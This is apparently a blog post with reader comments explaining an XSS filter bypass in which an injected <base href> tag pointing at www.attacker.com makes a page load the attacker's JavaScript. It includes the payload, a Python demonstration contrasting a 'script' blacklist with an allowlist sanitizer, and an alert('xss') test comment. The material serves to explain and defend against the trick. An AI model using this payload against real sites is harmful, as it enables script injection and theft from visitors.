Sometimes when I develop web applications, I feel uneasy when I am asked to allow HTML in user input / output. What scares me? XSS, I think.

This morning I received an interesting email from the webappsec.org mailing list. Amit Klein found out that he can trigger an XSS without a <script> tag, nor inside one. Here is the PoC:

<html>

***XSS code may be embedded here***

<script src="/foo/bar.js"></script>

</html>

The XSS payload is something like this:

<base href="http://www.attacker.com/">

And the attacker should put some JS on his host in the exact same directory (e.g. http://www.attacker.com/foo/bar.js), since the relative src="/foo/bar.js" is now resolved against the attacker's base URL. You know what happens next, right? :D

The coolest part of this XSS is that it doesn't even need a <script> tag or anything like it. And for developers who use / trust a blacklist approach (oranglist, greenlist, pinklist, or whatever you name it) that usually targets "script", this kind of attack will surely bypass it.

Nice one Amit Klein ;)

So, what is the solution? I myself suggest that you do not allow your users to use HTML :P
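As an added illustration (my own code, not Amit Klein's PoC or anything from the original post), the snippet below reproduces the page layout above with constructed values, shows that a "script"-only blacklist lets the <base> payload through and where the browser would then fetch /foo/bar.js from, and contrasts it with an allowlist sanitizer that never emits <base> in the first place. The victim page URL in the test is a hypothetical placeholder.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample: the post's page layout, with the attacker's <base href> in the
# user-controlled slot that precedes the relative <script src>.
USER_INPUT = '<base href="http://www.attacker.com/">'
PAGE_TEMPLATE = '<html>{}<script src="/foo/bar.js"></script></html>'

def naive_blacklist_allows(fragment):
    return "script" not in fragment.lower()  # the filter the post says gets bypassed

class _ScriptResolver(HTMLParser):
    """Records the first <base href> and every <script src>, as a browser does."""
    def __init__(self):
        super().__init__()
        self.base, self.scripts = None, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and a.get("href") and self.base is None:
            self.base = a["href"]
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

def resolved_script_urls(document, page_url):
    p = _ScriptResolver()
    p.feed(document)  # absolute URLs the browser would fetch for each <script src>
    base = urljoin(page_url, p.base) if p.base else page_url
    return [urljoin(base, src) for src in p.scripts]

class _Allowlist(HTMLParser):
    """Allowlist sanitizer: keeps a few formatting tags (no attributes), drops the rest."""
    ALLOWED = {"b", "i", "em", "strong", "p"}
    def __init__(self):
        super().__init__()
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag in self.ALLOWED:  # <base>, <script>, <a>, ... are never emitted
            self.out.append(f"<{tag}>")
    def handle_endtag(self, tag):
        if tag in self.ALLOWED:
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        self.out.append(html.escape(data))  # text is re-escaped on output

def sanitize(fragment):
    s = _Allowlist()  # rebuild from the allowlist, so <base> never reaches the page
    s.feed(fragment)
    s.close()
    return "".join(s.out)
```

With the blacklist, the script resolves to the attacker's host; after the allowlist pass it resolves back to the site's own /foo/bar.js.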


4 Responses to “Bypass Anti XSS Filter : A Little Nice XSS Trick”

  1. r3ck0rd says:

    or… I suggest using strip_tags? ;)

  2. qwerty says:

    The href stuff needs to be blacklisted. There are plenty of bypassing techniques that use the href tag to do it.

  3. test says:

    alert('xss');

  4. Idoenk says:

    There are so many ways to do XSS without using <script> tags.
    ref: rsnake's xss cheat sheet list :D
    ergh, hell yeah, just disable users from using html
